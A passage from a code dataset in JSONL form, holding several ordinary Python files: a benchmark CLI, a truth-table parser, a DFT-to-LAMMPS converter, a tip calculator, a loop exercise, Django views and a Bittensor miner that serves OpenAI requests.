method with *number* set to successive powers of\n ten (10, 100, 1000, ...) up to a maximum of one billion, until\n the time taken is at least 0.2 second, or the maximum is reached.\n Returns ``(number, time_taken)``.\n If *callback* is given and is not None, it will be called after\n each trial with two arguments: ``callback(number, time_taken)``.\n \"\"\"\n for i in range(1, 10):\n number = 10**i\n time_taken = self.timeit(number)\n if callback:\n callback(number, time_taken)\n if time_taken >= 0.2:\n break\n return (number, time_taken)\n\n\n@click.group()\ndef cli():\n pass\n\n\n@cli.command()\ndef show():\n \"\"\"show all cases\"\"\"\n pp({name: list(cases) for name, cases in CASES.items()})\n\n\ndef print_item(name, subname, value):\n print('{:>12}:{:<16} {}'.format(name, subname, value))\n\n\n@cli.command()\ndef test():\n \"\"\"test all cases\"\"\"\n for name, subcases in CASES.items():\n for subname, f in subcases.items():\n try:\n value = f(make_data())\n assert value['user'] == DATA['user']\n assert value['tags'] == DATA['tags']\n assert value['style'] == DATA['style']\n msg = 'OK'\n except AssertionError:\n msg = 'Failed\\n{line}\\n{value}{line}'.format(\n line='-' * 60, value=pp(value, output=False))\n except Exception as ex:\n msg = 'Failed: ' + str(ex)\n print_item(name, subname, msg)\n\n\n@cli.command()\n@click.option('--validr', is_flag=True, help='only benchmark validr')\ndef benchmark(validr):\n \"\"\"do benchmark\"\"\"\n if validr:\n cases = {k: CASES[k] for k in ['json', 'validr']}\n else:\n cases = CASES\n result = {}\n\n print('timeits'.center(60, '-'))\n for name, suncases in cases.items():\n for subname, f in suncases.items():\n data = make_data()\n n, t = Timer(lambda: f(data)).autorange()\n result[name, subname] = t / n\n print_item(name, subname, '{:>8} loops cost {:.3f}s'.format(n, t))\n\n print('scores'.center(60, '-'))\n base = result['json', 'loads-dumps']\n for (name, subname), v in result.items():\n print_item(name, subname, '{:>8}'.format(round(base / v * 1000)))\n\n\n@cli.command()\ndef profile():\n \"\"\"profile validr\"\"\"\n for name, f in CASES['validr'].items():\n print(name.center(60, '-'))\n params = 
{'f': f, 'data': make_data()}\n runctx('for i in range(10**5): f(data)', globals=params, locals=None)\n\n\nif __name__ == '__main__':\n cli()\n","repo_name":"guyskk/validr","sub_path":"benchmark/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":4121,"program_lang":"python","lang":"en","doc_type":"code","stars":208,"dataset":"github-code","pt":"71"}
+{"seq_id":"7478699458","text":"from calculators import *\n\ndef valid_parentheses(x):\n\n eq_list = x # eg. ['(,'p','and','q',')']\n\n if ')(' in eq_list:\n return False\n \n only_p = []\n for i in eq_list:\n if i in['(',')']:\n only_p.append(i) # eg. ['(',')']\n stack = []\n lookup = {')':'('}\n\n for p in only_p:\n if p == ')(':\n return False\n if p in lookup.values():\n stack.append(p)\n elif stack and lookup[p] == stack[-1]:\n stack.pop()\n else:\n return False\n \n return stack == []\n\ndef parentheses_calculator(test):\n \n if '(' not in test:\n return regular_calculator(test)\n\n op_i = 0 # deepest opening index\n cl_i = 0 # corresponding closing index\n for i in range(len(test)):\n if test[i] == '(':\n op_i = i\n if test[i] == ')':\n cl_i = i\n break\n\n sub_expression_result = regular_calculator(test[op_i + 1:cl_i])\n test = test[:op_i] + sub_expression_result + test[cl_i + 1:]\n\n if cl_i - op_i == 2:\n test = test[:op_i] + '-' + test[cl_i + 1:]\n\n while '-' in test:\n test = test.replace('-', '')\n\n return parentheses_calculator(test)\n","repo_name":"eyadjs/truth-table-generator","sub_path":"parentheses.py","file_name":"parentheses.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"31828506824","text":"#!/usr/bin/env python\r\n# coding: utf-8\r\nimport sys\r\nimport os\r\n\r\nnAtoms = 216\r\n\r\ndirectory = os.getcwd()\r\ninput_file_extension = '/gap2.out'\r\ninputfile = directory + input_file_extension\r\n\r\noutput_file_extension = '/gap2LAMMPS.out'\r\noutputfile = directory + output_file_extension\r\n\r\nnum_lines = sum(1 for line in open(inputfile))\r\n\r\no = open(outputfile, 'w+')\r\no.write('DFT Data File\\n\\n' + str(nAtoms) + ' atoms\\n\\n1 atom types\\n\\n')\r\n\r\nlines = open(inputfile).read().splitlines()\r\nfor n, line in enumerate(lines):\r\n\tif n == 37:\r\n\t\tnewline = line.split()\r\n\t\tprint(newline)\r\n\t\tbasisLength = float(newline[4])*.529177 #convert from bohrs to angstroms\r\n\tif n == 52:\r\n\t\tnewline = line.split()\r\n\t\txSize = float(newline[1])*.529177\r\n\t\tySize = float(newline[1])*.529177\r\n\t\tzSize = float(newline[5])*basisLength\r\n\r\n\t\to.write('0.0 ' + str(xSize) + ' xlo xhi\\n')\r\n\t\to.write('0.0 ' + str(ySize) + ' ylo yhi\\n')\r\n\t\to.write('0.0 ' + str(zSize) + ' zlo zhi\\n')\r\n\t\to.write('\\nMasses\\n\\n1 28.085\\n\\nAtoms\\n\\n')\r\n\tif n >= num_lines - 55 - nAtoms and n < num_lines - 55:\r\n\t\tnewline = line.split()\r\n\t\tatomID = n%(num_lines - 56 - nAtoms)\r\n\t\tatomType = 1\r\n\t\tblankLine = [str(atomID)]\r\n\t\tblankLine.append(str(atomType))\r\n\t\tblankLine.append(newline[1])\r\n\t\tblankLine.append(newline[2])\r\n\t\tblankLine.append(newline[3])\r\n\t\tseparator = '\\t'\r\n\t\tfinal_line = separator.join(blankLine)\r\n\t\to.write(final_line + \"\\n\")\r\n\r\n","repo_name":"dgunruh/Si-HJ-MD-DFT","sub_path":"FarmClusterScriptsAndFiles/nebCalculations/LAMMPS_neb/QEtoLAMMPS.py","file_name":"QEtoLAMMPS.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"69900400550","text":"# Functions for the tip calculator\n\ndef get_party_size(question, negative_input, error_message) -> int:\n '''Gets a users party size'''\n\n # flag to continue while loop\n party_size = True\n\n # Print a decorative title\n print(\"~~~~~~~~~~~~~~~~ PARTY ~~~~~~~~~~~~~~~~ \\n\")\n\n # While there isn't a party size given\n while party_size:\n # try and get an interger input from user\n try:\n # ask user for people in party\n party_size = int(input(question))\n\n # if number is less than 0, restart loop\n if party_size < 0:\n print(negative_input)\n continue\n\n # if the user enters 0, they want to exit\n if party_size == 0:\n exit()\n\n # print a spacer\n print()\n # return integer for party size\n return party_size\n\n # catch exception ValueError when user enters non-integer\n except ValueError:\n\n # print instructions\n print(error_message)\n\n\ndef get_bill_size(question, negative_input, error_message) -> float:\n '''Get the bill size from user, pre-tip'''\n\n # flag to continue while loop\n bill_input = True\n\n # Print a decorative title\n print(\"~~~~~~~~~~~~~~~~ BILL ~~~~~~~~~~~~~~~~ \\n\")\n\n while bill_input:\n try:\n\n # get users bill\n bill_pre_tip = float(input(question))\n\n # if bill is negative value, rerun loop\n if bill_pre_tip < 0:\n print(negative_input)\n continue\n\n # if bill is 0, then exit application\n if bill_pre_tip == 0:\n exit()\n\n # print a spacer\n print()\n # return the bill\n return bill_pre_tip\n # catch error of user inputing non type convertable value\n except ValueError:\n print(error_message)\n\n\ndef get_tip_percentage(question, negative_input, error_message) -> float:\n '''Gets the percentage to tip from the user'''\n\n # flag to continue while loop\n tip = True\n\n # Print a decorative title\n print(\"~~~~~~~~~~~~~~~~ TIP PERCENTAGE ~~~~~~~~~~~~~~~~ \\n\")\n\n # loop while no errors\n while tip:\n # try and get a float or int value from user\n try:\n tip_percentage = int(input(question))\n\n # if tip is less than 0, rerun loop\n if tip_percentage < 0:\n print(negative_input)\n continue\n\n # covert value given to decimal ie 20 = .20\n converted_tip = tip_percentage / 100\n\n return converted_tip\n\n except ValueError:\n print(error_message)\n\n\ndef get_tax_percentage(question, negative_input, error_message) -> float:\n '''Gets the percentage to tax from the user'''\n\n # flag to continue while loop\n tax = True\n\n # Print a decorative title\n print(\"~~~~~~~~~~~~~~~~ TAX PERCENTAGE ~~~~~~~~~~~~~~~~ \\n\")\n print(\"~~~~~~~~~~~~~~~~ DEFAULTS TO 10% ~~~~~~~~~~~~~~~~ \\n\")\n\n # loop while no errors\n while tax:\n # try and get a float or int value from user\n try:\n tax_percentage = int(input(question) or 10)\n\n # if tip is less than 0, rerun loop\n if tax_percentage < 0:\n print(negative_input)\n continue\n\n # covert value given to decimal ie 20 = .20\n converted_tax = tax_percentage / 100\n\n return converted_tax\n\n except ValueError:\n print(error_message)\n\n\ndef calculate_tip(party: int, tip_percentage: float, tax_percentage: float, bill: float) -> float:\n '''Calculates the bill per person of a party, after applying a tip percentage'''\n\n # calculate total bill with percentage of tip applied\n bill_w_percentage = bill * (1 + tip_percentage + tax_percentage)\n\n # calculate bill per person\n bill_per_person = bill_w_percentage / party\n\n # return bill per person\n return bill_per_person\n\n\ndef exit_application(text_to_exit, error_message) -> bool:\n '''Determines if user wants to exit 
application'''\n\n while True: # Ask user if they want to run application again\n run_again = input(text_to_exit)\n\n # # convert value to lower case for ease\n run_again = run_again.lower()\n\n # exit application if\n if run_again == 'no' or run_again == 'n':\n return False\n elif run_again == 'yes' or run_again == 'y':\n return True\n else:\n print(error_message)\n\n\ndef print_output(bill_pre_tip, tip_percentage, tax_percentage, party_size, bill_per_person):\n '''Prints a neat and clean output'''\n\n print()\n print(\"~~~~~~~~~~~~ TIP CALCULATIONS ~~~~~~~~~~~~\")\n\n print(\"Your bill total was:\" + f'${bill_pre_tip:.2f}'.rjust(22))\n\n print(f'Your tip percentage was:' +\n f'{int(tip_percentage * 100)}%'.rjust(18))\n\n print(f'Your tax percentage was:' +\n f'{int(tax_percentage * 100)}%'.rjust(18))\n\n print(f'Your party size was:' + f'{party_size}'.rjust(22))\n\n print('------------------------------------------')\n\n print(f'Bill per person:' + f'${bill_per_person:.2f}'.rjust(26))\n\n print()\n\n# Testing function for tip calc functions\n# assert calculate_tip(get_party_size(), get_tip_percentage(),\n# get_bill_size()) > 0, \"Return was negative\"\n# assert calculate_tip(1, .20, 10) == 12.00, \"Return didn't equal correct value\"\n","repo_name":"Blaine-Reid/python_tip_calculator","sub_path":"tip_calculator_no_ui/tip_calc_functions_no_ui.py","file_name":"tip_calc_functions_no_ui.py","file_ext":"py","file_size_in_byte":5468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
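The commented-out asserts above predate the four-argument signature of calculate_tip. A runnable self-check against the current signature (values chosen for easy mental math; math.isclose avoids float-equality pitfalls):

```python
import math

# 10.00 bill, 20% tip, 10% tax, party of 1 -> 10 * 1.30 / 1 = 13.00
assert math.isclose(calculate_tip(1, 0.20, 0.10, 10.0), 13.0)
# 100.00 bill, 20% tip, 10% tax, party of 4 -> 100 * 1.30 / 4 = 32.50
assert math.isclose(calculate_tip(4, 0.20, 0.10, 100.0), 32.5)
```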
+{"seq_id":"9112218278","text":"#Modifique o exercício anterior para aceitar somente valores maiores que 0 \n# para N. Caso o valor informado (para N) não seja maior que 0,\n# deverá ser lido um novo valor para N.\n\nn = int(input('Digite um valor: '))\nwhile (n <= 0):\n print('Digite um numero maior que zero')\n n = int(input())\n\nfor i in range(0, n):\n i = i + 1\n print(i)","repo_name":"eduardoanj/cursopyton","sub_path":"Nova pasta (2)/python/ex 44.py","file_name":"ex 44.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"40311338618","text":"from django.http import JsonResponse\nfrom .models import Profile\nfrom orders.models import Order\nfrom django.shortcuts import render, redirect\nfrom profiles.models import Profile\nfrom django.shortcuts import get_object_or_404\n\n\ndef profile(request, profile_name):\n try:\n user_profile = Profile.objects.get(nickname=profile_name)\n context = {\n 'profile': user_profile,\n 'name': user_profile.nickname\n }\n return render(request, 'profiles/profile.html', context)\n except Profile.DoesNotExist:\n return render(request, 'profiles/profile_not_found.html')\n\n\ndef home(request):\n userinfo = request.session.get(\"user\") if request.session.get(\"user\") else None\n if userinfo:\n id = userinfo.get('id')\n orders = Order.objects.filter(dev_id=0).exclude(user_id=id)\n name = userinfo.get(\"name\")\n nickname = userinfo.get(\"nickname\")\n picture = userinfo.get(\"picture\")\n return render(request, 'home.html', {'orders': orders, 'name': name, 'nickname': nickname, 'picture': picture})\n else:\n return redirect('/')\n\n\ndef myorders(request):\n userinfo = request.session.get(\"user\") if request.session.get(\"user\") else None\n if userinfo:\n user_id = userinfo.get(\"id\")\n name = userinfo.get(\"name\")\n nickname = userinfo.get(\"nickname\")\n picture = userinfo.get(\"picture\")\n orders = Order.objects.filter(user_id=user_id)\n return render(request, 'myorders.html',\n {'orders': orders, 'name': name, 'nickname': nickname, 'picture': picture})\n else:\n return redirect('/')\n\n\ndef mytasks(request):\n userinfo = request.session.get(\"user\") if request.session.get(\"user\") else None\n if userinfo:\n user_id = userinfo.get(\"id\")\n name = userinfo.get(\"name\")\n nickname = userinfo.get(\"nickname\")\n picture = userinfo.get(\"picture\")\n orders = Order.objects.filter(dev_id=user_id)\n return render(request, 'mytasks.html',\n {'orders': orders, 'name': name, 'nickname': nickname, 'picture': picture})\n else:\n return redirect('/')\n","repo_name":"7selik7/StuHub","sub_path":"profiles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"42976563537","text":"import re\nimport os\nimport time\nimport copy\nimport wandb\nimport json\nimport pathlib\nimport asyncio\nimport template\nimport argparse\nimport requests\nimport threading\nimport traceback\nimport numpy as np\nimport pandas as pd\nimport bittensor as bt\n\nfrom openai import OpenAI\nfrom functools import partial\nfrom collections import deque\nfrom openai import AsyncOpenAI\nfrom starlette.types import Send\nfrom abc import ABC, abstractmethod\nfrom transformers import GPT2Tokenizer\nfrom config import get_config, check_config\nfrom typing import List, Dict, Tuple, Union, Callable, Awaitable\n\nfrom template.utils import get_version\nfrom template.protocol import StreamPrompting, IsAlive, ImageResponse, Embeddings\n\n\nOpenAI.api_key = os.environ.get('OPENAI_API_KEY')\nif not OpenAI.api_key:\n raise ValueError(\"Please set the OPENAI_API_KEY environment variable.\")\n\nnetrc_path = pathlib.Path.home() / '.netrc'\nwandb_api_key = os.getenv('WANDB_API_KEY')\n\nprint(\"WANDB_API_KEY is set:\", bool(wandb_api_key))\nprint(\"~/.netrc exists:\", netrc_path.exists())\n\nif not wandb_api_key and not netrc_path.exists():\n raise ValueError(\"Please log in to wandb using `wandb login` or set the WANDB_API_KEY environment variable.\")\n\nclient = AsyncOpenAI(timeout=60.0)\nvalid_hotkeys = []\n\n\nclass StreamMiner(ABC):\n def __init__(self, config=None, axon=None, wallet=None, subtensor=None):\n bt.logging.info(\"starting stream miner\")\n base_config = copy.deepcopy(config or get_config())\n self.config = self.config()\n self.config.merge(base_config)\n check_config(StreamMiner, self.config)\n bt.logging.info(self.config) # TODO: duplicate print?\n self.prompt_cache: Dict[str, Tuple[str, int]] = {}\n self.request_timestamps = {}\n\n # Activating Bittensor's logging with the set configurations.\n bt.logging(config=self.config, logging_dir=self.config.full_path)\n bt.logging.info(\"Setting up bittensor objects.\")\n\n # Wallet holds cryptographic information, ensuring secure transactions and communication.\n self.wallet = wallet or bt.wallet(config=self.config)\n bt.logging.info(f\"Wallet {self.wallet}\")\n\n # subtensor manages the blockchain connection, facilitating interaction with the Bittensor blockchain.\n self.subtensor = subtensor or bt.subtensor(config=self.config)\n bt.logging.info(f\"Subtensor: {self.subtensor}\")\n bt.logging.info(\n f\"Running miner for subnet: {self.config.netuid} on network: {self.subtensor.chain_endpoint} with config:\"\n )\n\n # metagraph provides the network's current state, holding state about other participants in a subnet.\n self.metagraph = self.subtensor.metagraph(self.config.netuid)\n bt.logging.info(f\"Metagraph: {self.metagraph}\")\n\n if self.wallet.hotkey.ss58_address not in self.metagraph.hotkeys:\n bt.logging.error(\n f\"\\nYour validator: {self.wallet} if not registered to chain connection: {self.subtensor} \\nRun btcli register and try again. 
\"\n )\n exit()\n else:\n # Each miner gets a unique identity (UID) in the network for differentiation.\n self.my_subnet_uid = self.metagraph.hotkeys.index(\n self.wallet.hotkey.ss58_address\n )\n bt.logging.info(f\"Running miner on uid: {self.my_subnet_uid}\")\n\n # The axon handles request processing, allowing validators to send this process requests.\n self.axon = axon or bt.axon(wallet=self.wallet, port=self.config.axon.port)\n # Attach determiners which functions are called when servicing a request.\n bt.logging.info(f\"Attaching forward function to axon.\")\n print(f\"Attaching forward function to axon. {self._prompt}\")\n self.axon.attach(\n forward_fn=self._prompt,\n blacklist_fn=self.blacklist_prompt,\n ).attach(\n forward_fn=self._is_alive,\n blacklist_fn=self.blacklist_is_alive,\n ).attach(\n forward_fn=self._images,\n blacklist_fn=self.blacklist_images,\n ).attach(\n forward_fn=self._embeddings,\n blacklist_fn=self.blacklist_embeddings,\n )\n bt.logging.info(f\"Axon created: {self.axon}\")\n\n # Instantiate runners\n self.should_exit: bool = False\n self.is_running: bool = False\n self.thread: threading.Thread = None\n self.lock = asyncio.Lock()\n self.request_timestamps: Dict = {}\n thread = threading.Thread(target=get_valid_hotkeys, args=(self.config,))\n thread.start()\n\n @abstractmethod\n def config(self) -> \"bt.Config\":\n ...\n\n def _prompt(self, synapse: StreamPrompting) -> StreamPrompting:\n return self.prompt(synapse)\n\n def base_blacklist(self, synapse, blacklist_amt = 20000) -> Tuple[bool, str]:\n try:\n hotkey = synapse.dendrite.hotkey\n synapse_type = type(synapse).__name__\n\n if hotkey in template.WHITELISTED_KEYS:\n return False, f\"accepting {synapse_type} request from {hotkey}\"\n\n if hotkey not in valid_hotkeys:\n return True, f\"Blacklisted a {synapse_type} request from a non-valid hotkey: {hotkey}\"\n\n uid = None\n axon = None\n for _uid, _axon in enumerate(self.metagraph.axons):\n if _axon.hotkey == hotkey:\n uid = _uid\n axon = _axon\n break\n\n if uid is None and template.ALLOW_NON_REGISTERED == False:\n return True, f\"Blacklisted a non registered hotkey's {synapse_type} request from {hotkey}\"\n\n # check the stake\n tao = self.metagraph.neurons[uid].stake.tao\n # metagraph.neurons[uid].S\n if tao < blacklist_amt:\n return True, f\"Blacklisted a low stake {synapse_type} request: {tao} < {blacklist_amt} from {hotkey}\"\n\n time_window = template.MIN_REQUEST_PERIOD * 60\n current_time = time.time()\n\n if hotkey not in self.request_timestamps:\n self.request_timestamps[hotkey] = deque()\n\n # Remove timestamps outside the current time window\n while self.request_timestamps[hotkey] and current_time - self.request_timestamps[hotkey][0] > time_window:\n self.request_timestamps[hotkey].popleft()\n\n # Check if the number of requests exceeds the limit\n if len(self.request_timestamps[hotkey]) >= template.MAX_REQUESTS:\n return (\n True,\n f\"Request frequency for {hotkey} exceeded: {len(self.request_timestamps[hotkey])} requests in {template.MIN_REQUEST_PERIOD} minutes. 
Limit is {template.MAX_REQUESTS} requests.\"\n                )\n\n            self.request_timestamps[hotkey].append(current_time)\n\n            return False, f\"accepting {synapse_type} request from {hotkey}\"\n\n        except Exception:\n            bt.logging.error(f\"error in blacklist {traceback.format_exc()}\")\n            return True, \"error in blacklist\"\n\n    def blacklist_prompt(self, synapse: StreamPrompting) -> Tuple[bool, str]:\n        blacklist = self.base_blacklist(synapse, template.PROMPT_BLACKLIST_STAKE)\n        bt.logging.info(blacklist[1])\n        return blacklist\n\n    def blacklist_is_alive(self, synapse: IsAlive) -> Tuple[bool, str]:\n        blacklist = self.base_blacklist(synapse, template.ISALIVE_BLACKLIST_STAKE)\n        bt.logging.debug(blacklist[1])\n        return blacklist\n\n    def blacklist_images(self, synapse: ImageResponse) -> Tuple[bool, str]:\n        blacklist = self.base_blacklist(synapse, template.IMAGE_BLACKLIST_STAKE)\n        bt.logging.info(blacklist[1])\n        return blacklist\n\n    def blacklist_embeddings(self, synapse: Embeddings) -> Tuple[bool, str]:\n        blacklist = self.base_blacklist(synapse, template.EMBEDDING_BLACKLIST_STAKE)\n        bt.logging.info(blacklist[1])\n        return blacklist\n\n    @classmethod\n    @abstractmethod\n    def add_args(cls, parser: argparse.ArgumentParser):\n        ...\n\n    async def _images(self, synapse: ImageResponse) -> ImageResponse:\n        return await self.images(synapse)\n\n    async def _embeddings(self, synapse: Embeddings) -> Embeddings:\n        return await self.embeddings(synapse)\n\n    def _is_alive(self, synapse: IsAlive) -> IsAlive:\n        bt.logging.info(\"answered to be active\")\n        synapse.completion = \"True\"\n        return synapse\n\n    @abstractmethod\n    def prompt(self, synapse: StreamPrompting) -> StreamPrompting:\n        ...\n\n    @abstractmethod\n    def images(self, synapse: ImageResponse) -> ImageResponse:\n        ...\n\n    @abstractmethod\n    def embeddings(self, synapse: Embeddings) -> Embeddings:\n        ...\n\n    def run(self):\n        if not self.subtensor.is_hotkey_registered(\n            netuid=self.config.netuid,\n            hotkey_ss58=self.wallet.hotkey.ss58_address,\n        ):\n            bt.logging.error(\n                f\"Wallet: {self.wallet} is not registered on netuid {self.config.netuid}. \"\n                f\"Please register the hotkey using `btcli s register --netuid 18` before trying again\"\n            )\n            exit()\n        bt.logging.info(\n            f\"Serving axon {StreamPrompting} on network: {self.config.subtensor.chain_endpoint} with netuid: {self.config.netuid}\"\n        )\n        self.axon.serve(netuid=self.config.netuid, subtensor=self.subtensor)\n        bt.logging.info(f\"Starting axon server on port: {self.config.axon.port}\")\n        self.axon.start()\n        self.last_epoch_block = self.subtensor.get_current_block()\n        bt.logging.info(f\"Miner starting at block: {self.last_epoch_block}\")\n        bt.logging.info(\"Starting main loop\")\n        step = 0\n        try:\n            while not self.should_exit:\n                start_epoch = time.time()\n\n                # --- Wait until next epoch.\n                current_block = self.subtensor.get_current_block()\n                while (\n                    current_block - self.last_epoch_block\n                    < self.config.miner.blocks_per_epoch\n                ):\n                    # --- Wait for next block.\n                    time.sleep(1)\n                    current_block = self.subtensor.get_current_block()\n                    # --- Check if we should exit.\n                    if self.should_exit:\n                        break\n\n                # --- Update the metagraph with the latest network state.\n                self.last_epoch_block = self.subtensor.get_current_block()\n\n                metagraph = self.subtensor.metagraph(\n                    netuid=self.config.netuid,\n                    lite=True,\n                    block=self.last_epoch_block,\n                )\n                log = (\n                    f\"Step:{step} | \"\n                    f\"Block:{metagraph.block.item()} | \"\n                    f\"Stake:{metagraph.S[self.my_subnet_uid]} | \"\n                    
f\"Rank:{metagraph.R[self.my_subnet_uid]} | \"\n f\"Trust:{metagraph.T[self.my_subnet_uid]} | \"\n f\"Consensus:{metagraph.C[self.my_subnet_uid] } | \"\n f\"Incentive:{metagraph.I[self.my_subnet_uid]} | \"\n f\"Emission:{metagraph.E[self.my_subnet_uid]}\"\n )\n bt.logging.info(log)\n\n # --- Set weights.\n if not self.config.miner.no_set_weights:\n pass\n step += 1\n\n except KeyboardInterrupt:\n self.axon.stop()\n bt.logging.success(\"Miner killed by keyboard interrupt.\")\n exit()\n\n except Exception as e:\n bt.logging.error(traceback.format_exc())\n\n def run_in_background_thread(self):\n if not self.is_running:\n bt.logging.debug(\"Starting miner in background thread.\")\n self.should_exit = False\n self.thread = threading.Thread(target=self.run, daemon=True)\n self.thread.start()\n self.is_running = True\n bt.logging.debug(\"Started\")\n\n def stop_run_thread(self):\n if self.is_running:\n bt.logging.debug(\"Stopping miner in background thread.\")\n self.should_exit = True\n self.thread.join(5)\n self.is_running = False\n bt.logging.debug(\"Stopped\")\n\n def __enter__(self):\n self.run_in_background_thread()\n\n def __exit__(self, exc_type, exc_value, traceback):\n self.stop_run_thread()\n\n\nclass StreamingTemplateMiner(StreamMiner):\n def config(self) -> \"bt.Config\":\n parser = argparse.ArgumentParser(description=\"Streaming Miner Configs\")\n self.add_args(parser)\n return bt.config(parser)\n\n def add_args(cls, parser: argparse.ArgumentParser):\n pass\n\n\n async def embeddings(self, synapse: Embeddings) -> Embeddings:\n bt.logging.info(f\"entered embeddings processing for embeddings of len {len(synapse.texts)}\")\n\n async def get_embeddings_in_batch(texts, model, batch_size=10):\n batches = [texts[i:i + batch_size] for i in range(0, len(texts), batch_size)]\n tasks = []\n for batch in batches:\n filtered_batch = [text for text in batch if text.strip()]\n if filtered_batch:\n task = asyncio.create_task(client.embeddings.create(input=filtered_batch, model=model, encoding_format='float'))\n tasks.append(task)\n else:\n bt.logging.info(\"Skipped an empty batch.\")\n \n all_embeddings = []\n results = await asyncio.gather(*tasks, return_exceptions=True)\n for result in results:\n if isinstance(result, Exception):\n bt.logging.error(f\"Error in processing batch: {result}\")\n else:\n batch_embeddings = [item.embedding for item in result.data]\n all_embeddings.extend(batch_embeddings)\n return all_embeddings\n\n try:\n texts = synapse.texts\n model = synapse.model\n batched_embeddings = await get_embeddings_in_batch(texts, model)\n synapse.embeddings = batched_embeddings\n # synapse.embeddings = [np.array(embed) for embed in batched_embeddings]\n bt.logging.info(f\"synapse response is {synapse.embeddings[0][:10]}\")\n return synapse\n except Exception as e:\n bt.logging.error(f\"Exception in embeddings function: {traceback.format_exc()}\")\n\n\n async def images(self, synapse: ImageResponse) -> ImageResponse:\n bt.logging.info(f\"received image request: {synapse}\")\n try:\n # Extract necessary information from synapse\n model = synapse.model\n messages = synapse.messages\n size = synapse.size\n quality = synapse.quality\n style = synapse.style\n\n # Await the response from the asynchronous function\n meta = await client.images.generate(\n model=model,\n prompt=messages,\n size=size,\n quality=quality,\n style=style,\n )\n\n image_created = meta.created\n image_url = meta.data[0].url\n image_revised_prompt = meta.data[0].revised_prompt\n # image_b64 = 
meta.data[0].revised_prompt\n\n image_data = {\n \"created_at\": image_created,\n \"url\": image_url,\n \"revised_prompt\": image_revised_prompt,\n # \"b64\": image_b64\n }\n\n synapse.completion = image_data\n bt.logging.info(f\"returning image response of {synapse.completion}\")\n return synapse\n\n except Exception as e:\n bt.logging.error(f\"error in images: {e}\\n{traceback.format_exc()}\")\n\n\n\n def prompt(self, synapse: StreamPrompting) -> StreamPrompting:\n bt.logging.info(f\"started processing for synapse {synapse}\")\n \n async def _prompt(synapse, send: Send):\n try:\n model = synapse.model\n messages = synapse.messages\n seed=synapse.seed\n bt.logging.info(synapse)\n bt.logging.info(f\"question is {messages} with model {model}, seed: {seed}\")\n response = await client.chat.completions.create(\n model= model,\n messages= messages,\n temperature= 0.0001,\n stream= True,\n seed=seed,\n )\n buffer = []\n N=1\n async for chunk in response:\n token = chunk.choices[0].delta.content or \"\"\n buffer.append(token)\n if len(buffer) == N:\n joined_buffer = \"\".join(buffer)\n await send(\n {\n \"type\": \"http.response.body\",\n \"body\": joined_buffer.encode(\"utf-8\"),\n \"more_body\": True,\n }\n )\n bt.logging.info(f\"Streamed tokens: {joined_buffer}\")\n buffer = []\n\n if buffer:\n joined_buffer = \"\".join(buffer)\n await send(\n {\n \"type\": \"http.response.body\",\n \"body\": joined_buffer.encode(\"utf-8\"),\n \"more_body\": False,\n }\n )\n bt.logging.info(f\"Streamed tokens: {joined_buffer}\")\n print(f\"response is {response}\")\n except Exception as e:\n bt.logging.error(f\"error in _prompt {e}\\n{traceback.format_exc()}\")\n\n token_streamer = partial(_prompt, synapse)\n return synapse.create_streaming_response(token_streamer)\n\ndef get_valid_hotkeys(config):\n global valid_hotkeys\n api = wandb.Api()\n subtensor = bt.subtensor(config=config)\n while True:\n metagraph = subtensor.metagraph(18)\n try:\n runs = api.runs(f\"cortex-t/{template.PROJECT_NAME}\")\n latest_version = get_version()\n for run in runs:\n if run.state == \"running\":\n try:\n # Extract hotkey and signature from the run's configuration\n hotkey = run.config['hotkey']\n signature = run.config['signature']\n version = run.config['version']\n bt.logging.debug(f\"found running run of hotkey {hotkey}, {version} \")\n\n if latest_version == None:\n bt.logging.error(f'Github API call failed!')\n continue\n \n if version != latest_version and latest_version != None:\n bt.logging.debug(f'Version Mismatch: Run version {version} does not match GitHub version {latest_version}')\n continue\n\n # Check if the hotkey is registered in the metagraph\n if hotkey not in metagraph.hotkeys:\n bt.logging.debug(f'Invalid running run: The hotkey: {hotkey} is not in the metagraph.')\n continue\n\n # Verify the signature using the hotkey\n if not bt.Keypair(ss58_address=hotkey).verify(run.id, bytes.fromhex(signature)):\n bt.logging.debug(f'Failed Signature: The signature: {signature} is not valid')\n continue\n \n if hotkey not in valid_hotkeys:\n valid_hotkeys.append(hotkey)\n except Exception as e:\n bt.logging.debug(f\"exception in get_valid_hotkeys: {traceback.format_exc()}\")\n\n bt.logging.info(f\"total valid hotkeys list = {valid_hotkeys}\")\n time.sleep(180)\n\n except json.JSONDecodeError as e:\n bt.logging.debug(f\"JSON decoding error: {e} {run.id}\")\n\n\nif __name__ == \"__main__\":\n with StreamingTemplateMiner():\n while True:\n 
time.sleep(1)\n","repo_name":"BitAPAI/cortex.t","sub_path":"miner/miner.py","file_name":"miner.py","file_ext":"py","file_size_in_byte":20571,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"71"}
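base_blacklist above enforces a sliding-window request limit with a deque of timestamps per hotkey. A standalone sketch of that mechanism (the window length and limit are illustrative values, not the template.* constants):

```python
import time
from collections import deque

def allow_request(timestamps: deque, window_s: float = 60.0, limit: int = 10) -> bool:
    """Sliding-window rate limit: at most `limit` requests per `window_s` seconds."""
    now = time.time()
    # drop timestamps that have fallen out of the window
    while timestamps and now - timestamps[0] > window_s:
        timestamps.popleft()
    if len(timestamps) >= limit:
        return False  # over the limit: reject without recording
    timestamps.append(now)
    return True
```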
